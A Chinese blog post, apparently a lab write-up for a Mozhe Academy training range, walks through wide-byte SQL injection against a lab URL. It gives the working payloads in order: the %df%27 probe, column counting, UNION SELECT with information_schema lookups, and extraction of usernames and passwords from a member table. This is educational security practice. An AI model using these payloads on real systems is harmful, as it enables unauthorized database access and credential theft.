www.xiahuhu.cn
关注网络安全

SQL注入之宽字节注入–【SQL注入专题】

我有话要说:大锅本站部分分享的资源来自网络,如有侵权及其他事宜请点击联系我处理
之前突然对web安全有了有兴趣,想深入的学习下web安全相关的知识,所以在网上找了一个在线靶场(墨者学院)当练练手了,结果做着做着就停不下来了,积分一下子就刷到了第一,总共130几个靶场环境都基本上做完了,这里也把每个题的所涉及到的知识点分享出来。

实训目标

1、掌握SQL注入原理;
2、了解MySQL的数据结构;
3、了解宽字节的提交方式;
 

解题方向

使用宽字节注入,从数据库中获得用户密码,登录后台拿到key。
 

解题思路

一、注入点测试

在参数后面输入%df%27
http://219.153.49.228:42886/new_list.php?id=1%df%27
返回如下错误:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1�\''' at line 1
可以判断存在宽字节注入
 

二、判断字段数

id=1%df%27 order by 5%23 //页面返回正常 
id=1%df%27 order by 6%23 //页面报错
说明字段数为5
 

三、判断显示位置

id=1%df%27 and 1=2 union select 1,2,3,4,5%23
显示位置为5,3
 

四、判断当前数据库

id=1%df%27 and 1=2 union select 1,2,database(),4,5%23
当前数据库为:mozhe_discuz_stormgroup
 

五、判断数据库中的表

id=1%df%27 AND 1=2 union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=0x6d6f7a68655f64697363757a5f73746f726d67726f7570%23 
//注意:mozhe_discuz_stormgroup需要进行16进制编码得到6d6f7a68655f64697363757a5f73746f726d67726f7570,需要在前面加上0x 
得到数据库中的表为:
notice,stormgroup_member

六、判断表中列

id=1%df%27 AND 1=2 union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=0x73746f726d67726f75705f6d656d626572%23
得到列信息:
name,password,status
 

七、判断字段值

id=1%df%27 AND 1=2 union select 1,2,name,4,password from stormgroup_member limit 0,1%23 
得到第一个字段值
 
id=1%df%27 AND 1=2 union select 1,2,name,4,password from stormgroup_member limit 1,1%23 
得到第二个字段值
 
最后通过获取到的字段值就可以登录后台获取key了。
赞(0) 打赏
未经允许不得转载:花生米's Blog » SQL注入之宽字节注入–【SQL注入专题】
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏